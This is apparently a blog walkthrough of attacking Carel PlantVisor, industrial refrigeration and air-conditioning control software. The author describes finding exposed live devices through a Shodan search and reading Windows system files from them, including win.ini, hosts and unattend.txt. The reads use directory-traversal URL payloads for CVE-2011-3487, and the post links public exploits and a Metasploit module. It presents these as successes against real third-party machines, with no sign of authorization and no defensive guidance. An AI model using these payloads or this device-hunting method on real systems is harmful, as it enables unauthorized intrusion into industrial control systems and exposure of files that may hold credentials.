Hacking Walkthrough: Carel PlantVisor [ICS]
PlantVisor is a software that is responsible to control temperature of refrigerators and air conditioners . It can be part of an industrial organization and can be responsible for quality of products. It could also be in use by non-industrial entity. What matters is this software is exposed in the internet and by digging deeper , vulnerabilities are discovered. The servers I found were old windows operating systems.Enjoy the findings.
Software: Carel PlantVisor
Vulnerability: 2011-3487 (Directory Traversal)
Exploit: https://www.exploit-db.com/exploits/42707
Exploit: https://www.exploit-db.com/exploits/42706 [Metasploit]
Directory Traversal:
The exploit 42707 uses " boot.ini ". It works on most of the devices that I have discovered online. My findings are:
I used shodan to find these devices: Server: CarelDataServer
http://SERVER/..%5c..%5c..%5c..%5c..%5c..%5cboot.ini worked for me.
I experimented with different windows directories and files.
I succeeded with :
http://SERVER/..%5c..%5c..%5c..%5c..%5c..%5cwindows/win.ini
http://SERVER/..%5c..%5c..%5c..%5c..%5c..%5cwindows%5csystem.ini
http://SERVER/..%5c..%5c..%5c..%5c..%5c..%5cwindows%5csystem32%5cdrivers%5cetc%5chosts
http://SERVER/..%5c..%5c..%5c..%5c..%5c..%5cwindows%5csystem32%5cunattend.txt
http://SERVER/..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cexplorer.exe
Im sure you can find other files. For a guide on this read:
https://github.com/soffensive/windowsblindread/blob/master/windows-files.txt
Username Enumeration and authentication:
Comments
Post a Comment